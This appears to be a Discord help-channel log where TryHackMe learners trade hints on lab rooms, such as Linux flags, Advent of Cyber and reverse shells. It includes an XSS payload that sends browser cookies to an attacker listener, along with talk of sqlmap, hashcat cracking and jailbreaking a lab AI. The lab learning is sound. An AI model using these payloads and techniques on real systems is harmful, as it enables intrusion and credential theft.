Alright, so the issue is that i am given a list of three IP addresses, which i have to try one by one to identify which one is malicious. But the same grey pop up error message is showing when trying all three IP addresses.

tropic garden
gray kayak
#

Hey guys, I'm a beginner, and I've been trying to complete task 3 of the room "Experience Cyber Security." I've found the flag which is "BANK-HACKED" but it doesn't fulfill the required format of {_________} (there is a permanent underscore after 6 digits) can anyone help me?

grim lantern
molten jasper
#

I hacked the AI from https://tryhackme.com/room/promptdefence with a simple "Hello" - LOL
You had me with hello - Jerry Maguire - https://www.youtube.com/watch?v=cR9FMrck4gw

TryHackMe

Learn defence measures that can be taken against attacks like prompt injections and jailbreaking.

JERRY MAGUIRE is NOW PLAYING and can be found to Rent or Buy here: http://DP.SonyPictures.com/JerryMaguire

When a sports agent has a moral epiphany and is fired for expressing it, he decides to put his new philosophy to the test as an independent agent with the only athlete who stays with him and his former colleague.

WATCH MORE:
► Subscrib...

▶ Play video
#

works every time ...

regal knot
thin egret
#

high in linux funemental perms i cant seem to find the owner of "important"

regal knot
thin egret
#

i figured it out, i had to login to the ssh in the attack room, which i did

but then i went to get something to eat and it expired so and i wasnt in the ssh when my confusin happnbed

#

@regal knot

regal knot
waxen swift
regal knot
waxen swift
#

Exactly😂

#

This is the equivalent of if it works don't touch it

regal knot
waxen swift
#

Yep! 💯

#

Nice pfp btw bro

regal knot
waxen swift
#

But now I'm again curious

#

Because the ai translates what we say to numbers like hi how are u becomes 33 678 82 28

#

And then it matches it and responds

#

But I think the first time they gave the ai to much freedom/creativity

#

Like I think they set the temperature to 0.7-1.0 instead of 0.2 or 0.3

#

Which is probably why the first time it returned the flag

#

I don't know if what I said is understandable or confusing😂

regal knot
waxen swift
#

Dudeeeee

#

I'm speechless

#

Idk y I'm so awestruck every time i learn something

#

😂 😂

regal knot
#

yeah - pretty cool - deleted to not spoil

waxen swift
#

Yep

#

Plus the flag wasn't censored so it's best to delete it

regal knot
waxen swift
regal knot
#

but clearly this is not the way to secure these systems, am i right?😅

waxen swift
#

its a bit to easy

regal knot
#

well when you finish this module, if not already, HTB Academy has a next level AI course with optional cert at the end if you want to learn more

waxen swift
#

yoo thats awesome

#

ill check it out

#

how much is it bro

regal knot
waxen swift
#

alr bet

#

i actually live in india so its gonna be worth a bit more in ist

#

will probs save up for it

#

Bro I saw ur thm profile ur also doing the ai security path right?

#

@regal knot

regal knot
waxen swift
#

Yoooo

#

Dude how are u finishing paths so fast

regal knot
#

5yrs of practice, i guess?

waxen swift
#

Absolutely Inspiring

regal knot
#

keep on slaying it- 5 yrs flies by

waxen swift
#

My 1st year has just passed

#

So 4 more

#

💯 💯

#

Bro can i add u as a friend, wld like to keep in touch

regal knot
#

sure thing

waxen swift
#

Thank u

thin egret
#

When will the crontab on the deployed instance (10.144.181.45) run?

the answer is seven characters long

the only two possible crontabs it could be about are

0 */12 * * * cp -R /home/cmnatic/Documents /var/backups/

or 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/

#

the first runs at twelve hours and the second at 5

#

twelve, noon, 12am,twelveam are all wrong

#

apparnetly it was reboot

errant willow
#

hi

waxen swift
shy kayak
waxen swift
shy kayak
waxen swift
#

Thank you

#

😄 😄

simple fossil
#

What should I do? I'm starting in cybersecurity for the first time and I'm on the 'Intro to Defensive Security' task 4. It asks: 'What is the flag that you obtained?'. I need help, please. Thank you!

winter echo
winter echo
#

No worries

chilly drift
# winter echo No worries

Im on the smae level with thhe same issue, but ive done all the terminal stuff, and firefox isnt updating

ornate scaffold
#

Any help would be appreciated!

winter echo
winter echo
gritty ibex
#

I am having trouble with the Message to Garcia ( https://tryhackme.com/room/messagetogarcia ) room and I not sure where to go next.

||

  • I am able to determine what directories exist on the target machine using the resource fetcher
  • I discovered that the authorized_keys file is located in the /root/.ssh/directory.
  • I know that website files are located somewhere in /var/www/html/
  • I have run nmap against the target
  • I know there are three open ports: 22, 80, 5000
    • Port 22 has OpenSSH
    • Port 80 uses nginx
    • Port 5000 has been unidentifiable. Navigating to it in a web browser takes me to the web page.

I think my best path forward is to use the backup page to upload a new authorized_keys file that contains a new RSA public key that I generate. However, I cannot figure out how to traverse directories using the backups form and I have been unable to discover any ways to use command injection to move the file. I considered trying to initiate a reverse shell, but without a way to trigger the payload once I upload a script, it won't do anything.

Am I on the right track here? I was thinking maybe I forgot something from one of the other rooms (I'm working on the Jr. Penetration Test Path right now): is there a lesson that would point me in the right direction?
||
Thanks!

lost granite
#

having trouble with Experience Cyber Security room, in the screenshots they have provided, flags has been intentionally blurred. Is there a VM that is suppose to start and reveal the flag or how it works?

gritty ibex
#

I still need a hint for my above message. I added a link to the room I'm working on.

gritty ibex
regal knot
lost granite
regal knot
lost granite
#

cool, thanks for your help @regal knot

green minnowBOT
#

Gave +1 Rep to @regal knot (current: #296 - 36)

gritty ibex
green minnowBOT
#

Gave +1 Rep to @regal knot (current: #278 - 39)

rose venture
#

hi i'm stuck on OWASP Top 10 2025: Application Design Flaws Task 3 -

Been using this CURL - curl http://10.146.129.85:5003/api/process?data=debug against the victim machine.
Getting a 405 Method Not Allowed

Trying alot of stuff but not getting anywhere. Any tips?

rose venture
regal knot
honest arrow
#

Hi

#

Hi everyone! I'm stuck on a "Topic Transition Recap" task in the Windows and Active Directory room.

Task question: "What PowerShell command would reset the password for user 'alice' in Active Directory and prompt for the new password securely?"

I've tried:

Set-ADAccountPassword -Identity alice -Reset -NewPassword (Read-Host -AsSecureString -Prompt "New password")

But I keep getting: Set-ADAccountPassword: invalid arguments

I've checked for typos, kept it on one line, and included -Reset. Nothing works. Could someone please point out what I'm missing? Thank you!

potent anchor
honest arrow
#

Thanks

rose venture
regal knot
rose venture
regal knot
#

But that is the labs lesson

rose venture
regal knot
wispy birch
#

I am having trouble with a question from Task 6 of the Splunkk 2 room. here is the particular question I am having an issue with :

"What unusual file (for an American company) does winsys32.dll cause to be downloaded into the Frothly environment?"

https://tryhackme.com/room/splunk2gcd5

TryHackMe

Part of the Blue Primer series. This room is based on version 2 of the Boss of the SOC (BOTS) competition by Splunk.

jolly terrace
#

i forget all my thing

dire osprey
#

How can I get the last flag of Vectara room

regal knot
# jolly terrace can you help me on this

i mean that curl command will solve that answer, just grab the required cookies from devtools and run it. if all of that is new to you - it's a great op to dive in and learn about it. GPT will explain it to you like you are 5;)

sturdy robin
#

Am I allowed to ask for assistance on the last question of the Vectara room? The others were fairly easy to get thru, but this one is posing quite difficult. I've 'discovered' a number of items of interest in the output and I have some theories on what may need to be done, but absolutely nothing feels like it is actually getting me closer to the flag. I've been working on it for hours and hours and I'm pulling my hair out

sturdy robin
#

I just really need to know after failing for so many hours and having to interact with that putz medbay.ai 😭

sharp jasper
#

who could point me in the direction of xss learning to get cookies?

stuck light
#

Yo guys can I publish a writeup of vectara with all flags hidden? or do i have to wait till the event ends?

tropic garden
tropic garden
jolly terrace
olive hollow
olive hollow
latent gyro
rancid ravine
#

any hints for model leakage event 1-2? i just finished all from easy to insane but in model leakage i got flag 3 but lost somewhere 1 n 2...

oblique grove
#

Does anyone have any hints to getting flags 1 & 2 from task 2 on Injectus IX

serene gull
#

man been stuck on the Vectera last task for 2 days now. so far i have made the bot reveal the system prompt and i have found the class-3 medicine's name. but i cannot really exploit the LLM05 vulnerability. ]

dim coyote
#

anyone please help me in ctf

dim coyote
hazy temple
dim coyote
hazy temple
timid bane
#

I am having a problem in this room Penetration Testing Frameworks task 9 Question 2

dim coyote
regal cedar
#

Hi, did anyone here finish the room “Support”
It’s in Jr pentester > web application vulnerabilities II

dusty phoenix
#

Hi, im also having some trouble getting through "Support", has anyone here finished it?

dusty phoenix
#

I already got to the api panel and got the admin email, i tried bruteforcing the password with ffuf and rockyou but page crashed at the 80,000 pass attempt

#

where you at?

regal cedar
#

I’m done

#

There’s no brute forcing after support account

#

Look at the module where the room is in, you gotta test for everything you learned

dusty phoenix
#

I guess the only thing i have left is command injection but i can't seem to get where i could try it

regal cedar
#

So you got flag1 right?

#

Command injection is only after flag1

dusty phoenix
# regal cedar So you got flag1 right?

Not yet, i have the admin email from the API and i found some password in config.php from the LFI in the themes but it does not seem to work for the admin email, do you know where i should look at next?

timid sorrel
#

Is there anyone that has completed the new room Silent Monitor?

rare belfry
#

You can text me in dm I already finished all the rooms✅

viscid spindle
#

hello people out there!! i'm new to this Discord channel!! i was facing problem in doing the TryHackMe cybersecurity tasks especially task 5 reset password and fuzzing! can someone help me with that one pls!!

dim coyote
serene gull
#

yo guys does the room "intro to csrf" require the attackbox? i usually avoid using the attackbox and use a kali vm instead, but it seems that for this specific room, i would need the attackbox

#

i have already created the settings.html file on the attackbox for carrying with the html attack, but i simply cannot access that site

odd void
#

1nd

royal badger
#

hello

bitter crane
#

dun dun duuun

lament ibex
#

hi

fierce burrow
glossy basin
peak marsh
#

ooooo Love this

ancient ember
#

Ayyy new rooom vent

tranquil nymph
#

soo, im doing day 12 of advent of cyber (encryption/decryption stuff)
we got an encrypted .gpg file and a rsa key

#

cant import the key

#

now, the key isnt a gpg key

stuck fractal
#

@tranquil nymph You need to read the hints for that one

#

There's no other way

tranquil nymph
#

oh

#

rip

#

should have done that earlier

#

now this gets me to wonder tho, why couldnt john get the passphrase of the key if it was so short and simple

stuck fractal
#

Wordlists

deft jay
#

can someone help me im a begginer and I just connected and started the VulnUniversity and I used zenmap on the given IP and it doens't show anything

odd void
#

I think you'll be better off in #room-help , there's more guided help in there rather than pointers and hints wait no james said otherwise

deft jay
#

somebody pointed me to here

#

yeah james said so

stuck fractal
#

Give the room a chance to boot

deft jay
#

anyway could somebody help me?

#

How do I know when it finished to boot?

stuck fractal
#

Give it 5mins

deft jay
#

oh ok

steady stratus
#

It'll take a couple of minutes, are you able to ping the IP address perhaps?

bitter crane
#

it's gonna respond to ping way before it starts responding to most other services

deft jay
#

ok yeah that'll be the check I'll script that so I'll know when the machine is booted

steady stratus
#

you don't need to script a ping 🙂

deft jay
#

I guess

#

yeah I'm able to ping it

steady stratus
#

That's like chopping onions with a samurai sword...

#

or some other obscure metaphor

deft jay
#

lol

#

I'll delete it later so there won't be spam

steady stratus
#

anyway I'm able to ping it but its still show's the following message at zenmap "NSE:

dnet: Failed to open device eth0

@deft jay

#

Zenmap is trying to use eth0, not tun0 (the vpn)

bitter crane
#

"Shooting sparrows with a cannon", @steady stratus ;)

steady stratus
#

that works too! @bitter crane :^)

deft jay
#

Zenmap is trying to use eth0, not tun0 (the vpn)
@steady stratus
How do I tell it to scan the VPN?

steady stratus
#

If you can ping it then you're connected to the network so it's not like tun0 doesn't exist.

Uhm, can you just nmap it through the command line? say nmap -sV <ip address> ?

deft jay
#

I'll try

stuck fractal
#

Are you running as an administrator?

deft jay
#

yeh

#

yeah'

#

If you can ping it then you're connected to the network so it's not like tun0 doesn't exist.

Uhm, can you just nmap it through the command line? say nmap -sV <ip address> ?
@steady stratus

still doesn't work

steady stratus
#

do you get any kind of output from that? even an error message? This'll be for #site-support I think now

tranquil nymph
#

ok, for the day 13 challenge i tried so far:
||iis exploits in metasplot
bluekeep exploit
hammering rdp with common usernames + rockyou
enumerate webserver - quite literally nothing there besides the demo page from what i can see||

#

i dont want to click the actual hint on there since they might be too big

stuck fractal
#

Oh, retro

#

OSINT it @tranquil nymph

tranquil nymph
#

huh ok

stuck fractal
#

Look ||on the page at all the posts||

white salmon
#

I don't understand flag20 in linuxctf
I found the file not that I really had to look for it and the output looks different to previous flags, but it is of the same type (ASCII) so I don't believe I need to convert it or anything. I don't know what data type ends with =
Someone push me in the right direction?
It just says find and retrieve flag20

tranquil nymph
#

ohhhhhhhhhh

#

i should have just used a bigger wordlist

stuck fractal
#

@tranquil nymph No, OSINT

#

Read it and do some research

tranquil nymph
#

yeah, i didnt even find ||/retro|| because i used a small wordlist

stuck fractal
#

o, you were stuck there

tranquil nymph
#

yup

north moat
#

any hint for HackPark room ?

#

What is the name of the binary you're supposed to exploit?

stuck fractal
#

The room has hints

#

Follow those

north moat
#

yes but how can i see log service

stuck fractal
#

Research

glossy basin
#

googling is not bad, it's a part of your learning!

bitter crane
#

googling is a pentester/hacker's best friend, even when they're really up there skill/knowledge-wise

glossy basin
#

exactly

#

especially CVE database + exploitdb is something which is supposed to be used

bitter crane
#

heck, or just plain ol' stackoverflow :p

glossy basin
pure dune
#

Any advice for getting the php reverse shell to work? Added internal IP and port, listening with nc, but nothing coming through

tranquil nymph
#

the shell must be executed

pure dune
#

Yeah, ran it but still nothing

tranquil nymph
#

hmm, odd

pure dune
#

getting failed to daemonise error, which it says is non-fatal

#

still nothing on nc

glossy basin
#

try redoing it

#

cuz seems like you are doing everything right

pure dune
#

i've tried several times and used diff ports (4444, 1234, 80)

#

weird. I'll keep trying

tranquil nymph
#

what room are you doing

glossy basin
#

did you set the same port at nc

pure dune
#

vulnversity

glossy basin
#

ye i knew that

pure dune
#

yea, set nc to listen on port in script

#

gonna start over from scratch

#

thanks for the quick responses tho

glossy basin
#

🙂

white salmon
#

finished cmess room,I'm never forget it 🙂

pure dune
#

Popped!

#

Problem was I was using my internal virtual ip address while also using the THM Kali instance. Gotta ifconfig within the instance to get the actual IP to use in the script

white salmon
#

if i'm not getting tomcat version from nikto in toolsrus room

#

done

inland onyx
#

May I suggest waiting a little longer before asking Xande? As I think you've noticed, a lot of questions can be answered with a little more patience.

white salmon
#

ok

#

but the room is for help ,isnt it ?

steady stratus
#

Correct

#

But as you've discovered yourself, if you spend a little bit of time on it - you can solve it yourself!

#

That in itself is worth 1000x more then someone telling you how to do

white salmon
#

right

steady stratus
#

If you feel like you're going down the right path or need a little push in the right direction, that's what this room is for 🙂

idle merlin
#

Am I the only one getting only a single port found open on thecodcaper with -p-?

dusky vigil
#

Also to build upon what @steady stratus just said, even if you're on the wrong path. Rabbit holes are a learning experience too! You don't learn anything being spoon fed

inland onyx
#

Terminate, refresh and reboot @idle merlin

#

That was a problem

#

We've fixed it now though

idle merlin
#

Was that in the past 30 mins? Did that exact step 30m ago before bothering to even ask haha

inland onyx
#

Mhm. My working version has been up for 35 minutes now

idle merlin
#

A'ight, lemme give it another try

#

Gonna give it some time in case the service is taking its time but still only getting the http atm. Be back in ~10 mins with an update 😛

inland onyx
#

SSH should start up pretty quickly

#

What is the title of the machine?

idle merlin
#

Machine 1

inland onyx
#

If it's Machine 1 then there's a problem

idle merlin
#

Oof

inland onyx
#

Right

white salmon
#

Excuse

inland onyx
#

This is ridiculous

white salmon
#

Hold on

#

Terminate, refresh the page, and redeploy @idle merlin

idle merlin
#

There we go, must have been the need to refresh. Getting the Caping of Cod now

white salmon
#

Por favor

#

Ok that's better

tranquil nymph
#

woah

#

its my first time using sqlmap

#

and this is crazy powerful

white salmon
#

Mhm

cyan swift
#

Can someone verify if my hashcat command is correct for 'Crack the hash' room?

cyan swift
#

This is the command Im using for level 2, question 3: ||hashcat -m 1800 '$6$rounds=5$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.' rockyou.txt --force||

stuck fractal
#

@cyan swift For some reason, skip the rounds

tranquil nymph
#

so, the database is compromised and sqlmap spat me out some username/password tuples...
but none of them match the format of the task

inland onyx
#

What command did you use?

tranquil nymph
inland onyx
#

Um

tranquil nymph
#

the interesting user would be

#

debian-sys-maint

inland onyx
#

Ah, ok, different way of doing it

#

I would always recommend capturing a request and passing it in with -r for SQLMap

#

Makes life a lot easier

tranquil nymph
#

huh

inland onyx
#

Try doing --dbs for your first scan as well

#

Gives you the lay of the land

tranquil nymph
#

hmm

#

what exactly would be the upside of using -r instead?

plush estuary
#

I believe it's able to parse it faster than sending a GET request

#

It also doesn't break as much

tranquil nymph
#

oh

#

i figured it out

#

really nice pointer with the --dbs

inland onyx
#

😄

#

And yeah, it gives SQLMap something definitive to latch onto, rather than setting it at a URL

#

GIving it a previous request means it knows exactly what to go for

tranquil nymph
#

gotcha

#

makes sense

tranquil nymph
#

ahhh i cant wget a reverse shell on the target

#

do i really have to echo the entire reverse shell into a file

#

nvm

#

big nvm

white salmon
#

Hello, I am on the Linux Challenges and am stuck. In Task 2, #5 it says "Find and retrieve flag 5" / the hint says to use the find command. However, I must be missing something because running the command
"

#

find . -name "flag5"

#

isnt returning anything as of yet, (and i do have the * around flag5 it just keeps making it italic)

inland onyx
#

You're currently only searching the current directory @white salmon

#

Try searching the whole system

white salmon
#

Hmm, I tried that, I went up to / with both Bob and Garry. Maybe I'm missing it

#

AH I think I found it

inland onyx
#

😄

white salmon
#

Missed it. piped my find command into a grep command. worked well 🙂 I will use that from now on lmao

#

Hmm, "Look at the systems processes. What is flag 7"

I am assuming it's not asking for a "ps -A" because that's not it lmao

#

Man I thought I was comfortable with Linux 😂

#

OH F ME.
Okay, I promise everyone I am smarter than this omg 😂 I found it...

#

Okay, first hour of TryHackMe done! Super excited to be a subscriber.

half mason
#

I got the worst score on most room So don't worry

wintry isle
#

Anyone around to help with an issue, I'm not sure if it's burp or something else.

neon zenith
#

@wintry isle i think u should ask at #site-support instead here :/

pearl junco
#

Hello for the reverse shell, which ip address should I use? Virtual ip or real ip

steady stratus
#

Morning! You need to use the IP address given by OpenVPN / TryHackMe

pearl junco
#

You can do ‘Sudo ifconfig’ and look for “tun0” or check your “internal IP Address” on https://tryhackme.com/access
@steady stratus thanks

white salmon
#

Hello, Im on the Advent of Cyber and I'm stuck at the last exericese of task 9. The password hash I must recover seems to be inthe file /etc/shadow but I have no right to the file whatsoever and I'm not on the sudoers list. Can't find my way around this one 😦

glossy basin
#

@white salmon yes. you don't have permission to read it, but you can find a backup file 😉

#

(which you will have permission to read)

white salmon
#

Oho !!! thanx @glossy basin !

little summit
#

first time asking for a hint

#

the cod caper, found an ssh key need the password

inland onyx
#

Ignore the key, use the RCE you already have to look for the password on the remote system.

rigid inlet
#

hey guys im just starting and already facing an issue 😮 i started off w beginners lessons and on point 3 it asks for flag3 which should be located where bobs bash history is in. I thought it will be cd /home/bob but cant seem to find it there nor somewhere in the other folders after I ls objects in home directory

#

can someone help out right quick would appreciate

#

thahnks

stuck fractal
#

cd /home/bob just puts you in bobs home dir

bitter crane
#

What's the name of the bash history file? :)

rigid inlet
#

hm

#

im not sure BreadTh 🙂 i found the bash history itself by just typing history

bitter crane
#

ah, right!

#

psst, that was a prompt to google :p

rigid inlet
#

ahaha ok ok 😄

bitter crane
#

;)

rigid inlet
#

okay im still confused this is what google tells me

#

The bash shell stores the history of commands you've run in your user account's history file at~/. bash_history by default. For example, if your username is bob, you'll find this file at /home/bob/. bash_history

#

so im wrong in bobs home directory still ?

bitter crane
#

there's no space in there

#

/.bash

rigid inlet
#

sweet okay

#

found it

#

🙂

bitter crane
#

Neato!

white salmon
#

i waited like an hour for nessus plugins to compile 🙂

bitter crane
#

I hear nessus is slow like that, yes

#

I dread when I have to do it myself. But it has to be done!

white salmon
#

yep.thats right

dusky vigil
#

@white salmon yes. Hence the big deploy button

white salmon
#

yep,but i had to finsh the above one

#

terminate*

dusky vigil
#

Then finish it...

#

Look. If you haven’t finished one task. Don’t move forward. Especially if you have to deploy another

mighty thorn
#

how do we call a unknown security bug ?

bitter crane
#

Are you thinking of a 0day?

#

(0 days since discovery)

mighty thorn
#

thanks bro i've just find that

#

Yea like i knew it was zero day but the answer was only Four carachters

bitter crane
#

oh, hehehe

bitter stump
#

cheeky answers

bitter crane
#

yeah, it's usually written with the number

mighty thorn
#

yea new information for me

#

okay i need a hint for this again

#

" Entering enough data to make the application crash! "

#

?

bitter crane
#

I don't know the room, but it sounds like the word enough is the key

mighty thorn
#

Okay i'll go with that

#

the room is Pentest quiz not a big deal

bitter crane
#

could you link it?

mighty thorn
tranquil nymph
#

so umm, when doing xss where the previous injected scripts stay in the html... any way to "clean" that up?

bitter crane
#

oh, i see, @mighty thorn. I didn't realize it was a quiz-quiz

mighty thorn
#

ah okay xD

#

like it's cool cause i felt refershing mymind

bitter crane
#

the question is what is it called when you enter so much data that the application can't handle it

#

the premise is to use google to find the answers :)

#

@tranquil nymph I don't suppose you could make another inject that deletes it? :p

mighty thorn
#

i've a got a hint it's whats the process of converting information or data into a code ?

tranquil nymph
#

i wonder if i can

#

i never did anything with js

#

ugh, now i killed my own injection "gateway" with the script

#

time to reboot the room

mighty thorn
#

the answer is buffer overflow xD

bitter crane
#

there you go

#

yeah, in injections there are definitely failstates that you can't recover from, @tranquil nymph

tranquil nymph
#

my mistake was extra dumb there.. i mistyped the closing tag, so the html below there just didnt get parsed properly

#

and the script is injected above my injection point

bitter crane
#

it did exactly what you told it to :D

#

machines are stupid like that

tranquil nymph
#

yup

mighty thorn
#

Guys need help in how to use the grep comand in vim ?

bitter crane
#

Have you tried googling it? I'm not being sarcastic

glossy basin
#

googling is not cheating

#

it's researching and learning

mighty thorn
#

@bitter crane it's okay bro say whatever you like and like when i get sick of searching trought google i came up in here ?

#

@glossy basin yea i know bro don't worry guys like i've been searching in google like for two days ? maybe i'm missing something

glossy basin
#

took me ~2 seconds honestly

mighty thorn
#

well thanks dude and maybe i'm stiil new in searching or something
Maybe i'm noob in searching throught google

#

but i really apperciate that from you both of you

glossy basin
#

nah that's fine don't worry

boreal whale
#

I'm stuck----

  1. Flag12 in located where MOTD's are usually found on an Ubuntu OS:
    which is in /etc/motd :? but it is saying that /etc/motd does not exist
  2. Find infomration aabout the system, such as kernel version etc. Flag 15:
    Hint: *release <-- no clue what this hint is supposed to mean ;DD
    I've tried bunch of command that I found through google but nothing helped,
inland onyx
#

@mighty thorn don't worry. Literally, my next tutorial room is on research skills...

mighty thorn
#

@mighty thorn don't worry. Literally, my next tutorial room is on research skills...
@inland onyx Well let me know when you realese it i'll be the one in there

twilit cradle
#

Hey so I have solved hackpark for the most part ( the intended method as well) and cant find out what the abnormal service is. Can anyone give a hint?

final sundial
#

linux basic flag24 any hints? thanks

inland onyx
#

What's the question @final sundial?

final sundial
#

Analyse the flag 24 compiled C program. Find a command that might reveal human readable strings when looking in the source code.

#

i found some commands like readelf or objdump

#

but they dont match

stuck fractal
#

Super basic RE thing @final sundial

#

You can get the answer with some googling

final sundial
#

ok

stuck fractal
#

find strings in binary as your search or something

final sundial
#

ok

#

stop

stuck fractal
#

Google should be your first port of call

final sundial
#

thanks

stuck fractal
#

Like always

final sundial
#

Google should be your first port of call
@stuck fractal yeah, i know. Thank you

stuck fractal
#

Then do it 😛 don't ask here first

stable hatch
#

@boreal whale you can try to how all the content of *release, /etc/release

#

Hi, I'm stack at the flag27 and flag26 in the Linux Challenges room, I can't find flag26 and flag27 is owned by root and I'm not in the sedoers grop. any hint how to get those two flags, thanksHi, I'm stack at the flag27 and flag26 in the Linux Challenges room, I can't find flag26 and flag27 is owned by root and I'm not in the sedoers grop. any hint how to get those two flags, thanks

inland onyx
#

@stable hatch did you not literally just ask that in #room-help?

stable hatch
#

@inland onyx yes, I did, but I got no response, and since this room is for hints I guess I'll may have an answer here. and I'm new in here

inland onyx
#

This room is for if you want a quick hint. Rooms-help is for if you need it explained.

#

Either way, do us a favour, pick one of them?

#

Have you had a look at the hint for 27?

white salmon
#

any hint for task 6,challenge 7

#

in RP Nessus

stable hatch
#

ok, actually I need a hint, and as I said, I'm new in discord, I'm learning how things are working here. Yes I did took a lot at the hint for 27, it said "sudo -l", but the user isn't in the sedors group, I guess I'cant run sudo

inland onyx
#

Maybe try another user?

boreal whale
#

@stable hatch cat /etc/*release, worked thanks !!

stable hatch
#

@inland onyx thanks, it works for an other user

inland onyx
#

👍

#

Flag 26 is a pain. You're gonna need to have a decent knowledge of regex

stable hatch
#

ok thanks for the hint

inland onyx
#

When it says find

#

It means literally

#

Put it that way...

tranquil nymph
#

ugh, still sitting on the XSS thing

#

i can only get my own authid, need admin one tho

#
<script>
    function talk(content) {
        var xh = new XMLHttpRequest();
        xh.open("GET", "http://<lhost>:4444/?stuff=".concat(content), false);
        xh.send(null);
    }
</script>
<a href="javascript:talk(document.cookie.split(';'))">Click me!</a>
#

this is what i got so far as payload

inland onyx
#

Which room is that?

tranquil nymph
#

advent of cyber

inland onyx
#

Hmm. Try making it slightly less complicated to get it working first

#

I know a lot of people struggled with the AJAX in that one

#

Well worth doing it the easy way first, then trying it the harder way

bitter crane
#

^ truest words about coding as a whole

stuck fractal
#

I think you end up hitting CORS often on that challenge

white salmon
#

anyone have a hint for Linux Challenges, Task 3, #6 "Flag 16 lies within another system mount"?

inland onyx
#

In which directories would you find mounted partitions by default?

white salmon
#

I thought in Dev but maybe I'm off

inland onyx
#

That would be unmounted partitions

#

Try partitions that are already mounted 🙂

white salmon
#

@white salmon there's a nice command that lists all mounted partitions

final sundial
#

Locate and retrieve flag26. Linux Challenge #7 am i following right road with this? grep -iRl "flag26" ./

inland onyx
#

No. Look for an actual flag, not the flag name

final sundial
#

i read that i should look for content not for file name

inland onyx
#

@white salmon I have a sneaky suspicion that command won't work on artificially mounted partitions
Worth a try though

final sundial
#

is it a photo/picture of a flag lol?

inland onyx
#

Nope

#

Just a 32 character string of random stuff

#

Same as the rest of the flags

#

Well, specifically, I reckon that's most likely a SHA256 hash, but that won't make much of a difference, knowing that

final sundial
#

ok

#

i will try to use this informations

white salmon
#

Im looking at the output of findmnt so see what I think are the already mounted partitions, but I could be way off lmao.

inland onyx
#

Probably best just looking in one of the two places you'd find mounted partitions

#

/mnt is one

#

There's another one for automatically mounted devices

white salmon
#

Mhm

#

Like when you plug a USB in

#

ohh, goodness gracious

#

Awesome, Task 3 done!

#

Nice!

grand rune
#

So I'm stuck at task 9 on Advent of Cyber, question 7. It asks me for the password hash of mcsysadmin and I (probably wrongly) assumed that it should be in /etc/shadow but I can't access the file (no rights to the file and not in sudoers file). The hint shows what looks like a path **********/*******/*, so I am now asking : Did I understand the question correctly?

glossy basin
#

you can't access /etc/shadow because you are not root

grand rune
#

I know

glossy basin
#

BUT you can find a backup file for that

#

which you have permissions to read

grand rune
#

oh thanks

#

I'll keep a note on grepping directory listings too

glossy basin
drowsy glen
#

Hello, does anybody have a hint for finding hidden password in room "The Cod Caper"? I'm running reverse shell via nc but I've found only secret SUID file which is doing nothing...

inland onyx
#

@drowsy glen have a look for files belonging to each user

#

And I mean, each user

white salmon
#

@inland onyx 😁

inland onyx
#

You can stop rubbing that in now Pars 😆

white salmon
#

😂😂😂😂

#

@drowsy glen when he says each user he really means each user

drowsy glen
#

@white salmon oh man 😄 I've already find out....NotLikeThis

unique locust
#

hi friends

glossy basin
formal cave
#

Advent of cyber

glossy basin
#

what's the issue?

formal cave
#

i stuck at question number to 2 how do i get open flag1.txt file

glossy basin
#

cat flag1.txt

white salmon
#

@formal cave are you new to Linux

formal cave
#

no @white salmon

#

how do i get the permission to open same file

white salmon
#

Do you just not have permission

#

To read it

#

Are you sshed in as the right user

formal cave
#

i am refering the document, it shows find / -user root -perm -4000 -exec ls -ldb {} ; what's that ?

white salmon
#

This is the second question

#

I don't think you need all that

formal cave
#

i am begineer in this things, can you help with that

white salmon
formal cave
#

cool

tranquil nymph
#

ok, i have figured out the XSS thing, but i dont quite understand why it worked

#

i basically just sent myself the cookie the (essentially) same way as before, but i only got the right one after deleting the cookie i had in the browser myself